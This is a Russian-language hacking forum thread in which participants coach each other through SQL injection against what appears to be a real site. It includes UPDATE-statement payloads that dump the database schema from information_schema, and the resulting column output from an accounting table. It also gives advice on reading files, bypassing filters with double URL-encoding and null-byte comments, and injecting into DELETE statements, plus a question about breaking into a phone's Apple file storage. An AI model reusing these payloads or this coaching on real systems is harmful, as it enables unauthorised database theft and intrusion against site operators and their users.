Ваши вопросы по уязвимостям.

update users_cards set cardno = '',cardno=version(), name='', name = '' where id_users=65 and id=33

 

Code:

update users_cards set cardno = '123', name = version() where id_users=65 and id=33 #', name = '' where id_users=66 and id=34
ERROR #1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'name = '' where id_users=66 and id=34' at line 3

 

сработало! То есть таким образом я в принципе могу с другой таблицы вывести данные?

 

да, можно через dios составить схему базы http://forum.sqliwiki.com/showthread.php?tid=39 чтоб одним запросом
насчет файлов не проверял, если file_priv = ON возможно получится читать файлы

 

просмотрел ман, все вроде как понятно, но не могу воспроизвести в update это

 

хз должно работать

Code:

',cardno=(SELECT group_conCat('<br>',table_name,0x3a,column_name) from information_schema.columns where table_schema=database()), name='

-----------------
ааа забыл совсем, там же длина поля cardno есть, все данные не влезут, лучше тогда по одной таблице селектить

 

<br>buh:id,<br>buhos,<br>buh:name,<br>buhrderid,<br>buh:note,<br>buh:type_,<br>buh:active,<br>buh:val1_name,<br>buh:val1_amount,<br>buh:val1_rest,<br>buh:val1_com,<br>buh:val2_nam
в name тоже скуля, там места больше, вот что выдало

 

кстати, подскажи, как по 1 выводить данные из таблиц и каким образом вывести просто все таблицы из бд, остальное сам докручу уже

 

как запросы к information_schema писать чтоль, серьезно)?

Code:

SELECT table_name from information_schema.tables limit 1,1
SELECT column_name from information_schema.columns where table_name='table' limit 1,1

таки вещи давно описаны - https://forum.antichat.ru/threads/sql-injection-polnyj-faq.43966/

 

да я вялого поймал, запутал сам себя с запросов в update, мало с ним связывался... лул

 

Мистика После коммента с двумя прочерками пробел ставишь?

 

конечно

 

Не поверишь!!! иногда благодаря этому и схватывается скуль)))), хз почему так...

 

в Яблочное хранилище файлов кто нить влазил ? при условии если телефон в руке ?

 

sql-injection
Кто нибудь сталвкивался с фильтрацией знака "_" подчеркивания, его как то можно побороть?
Даже с тем же table_name режет не говоря уже про таблицы с префиксом

 

двойной урлэнкод, /*%00*/ в начале запроса, запрос можно только одним методом передавать? попробовать другие(GET/POST/COOKIE)
https://forum.antichat.ru/threads/zadanie-1.453986/page-2#post-4120139 - редкий случай, но тоже может быть

 

Можно провести SQL Injection?

Code:

    $login = $_POST['login'];
    $login = stripslashes($login);   
    $login = htmlspecialchars($login);

 

эм а трабла конкретно в чём? давай подробней

Code:

$ cat 1.php
<?php
$login = $_POST['login'];
$login = stripslashes($login);
$login = htmlspecialchars($login);

var_dump($login);

------------------------

:~$ curl ******/1.php' --data 'login=123%27or1%271'
string(9) "123'or1'1"

 

В iframe невозможно открыть страницу если у саита https как у vk например

 

Можно ли что-то внедрить или считать с базы, если инъекция есть в конце запроса DELETE FROM ?
То есть имеем запрос "DELETE FROM My_Messages WHERE Message_Number =Инъекция
К сожалению база данных не поддерживает разделение запросов с помощью точки с запятой.